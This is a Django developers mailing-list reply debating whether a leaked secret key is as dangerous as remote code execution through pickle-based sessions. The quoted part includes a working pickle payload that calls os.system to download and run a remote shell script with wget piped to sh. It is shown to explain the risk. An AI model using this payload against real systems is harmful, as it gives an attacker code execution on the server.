Hi, On Sunday, October 2, 2011 2:31:19 PM UTC+2, Paul McMillan wrote: > > > P.S.: Btw, if you leak your secret key, you can get an admin user with a > > json backend too, while not being remote code execution it's still > something > > I would consider as catastrophic as code execution in most of my > projects. > > No. It's far less catastrophic. It just means I'm a Django admin and can > trash that project (which you can then restore from the backups). I can't > own all your other Django projects on the same machine, steal your deploy > keys, root your server, and then configure it to attack your dev machine > when you SSH into it to see why weird things are happening. Remote code > execution is BAD. >
Okay even if you disagree, I consider both catastrophic (For me there is no such thing as less catastrophic -- heads would roll in either case). > data = "cos\nsystem\n(S'wget -q -O - subversivecode.com/evil.sh | > sh'\ntR.'" > import pickle; pickle.loads(data) > > And then open a new bash window. > Wow, I have to read up on pickle again, thanks for the great example -- though my "paranoia" forced me to try it without "|sh" no matter how trustworthy you are ;) Thanks again for the explanation. Cheers, Florian -- You received this message because you are subscribed to the Google Groups "Django developers" group. To view this discussion on the web visit https://groups.google.com/d/msg/django-developers/-/nfg07OnF898J. To post to this group, send email to django-developers@googlegroups.com. To unsubscribe from this group, send email to django-developers+unsubscr...@googlegroups.com. For more options, visit this group at http://groups.google.com/group/django-developers?hl=en.
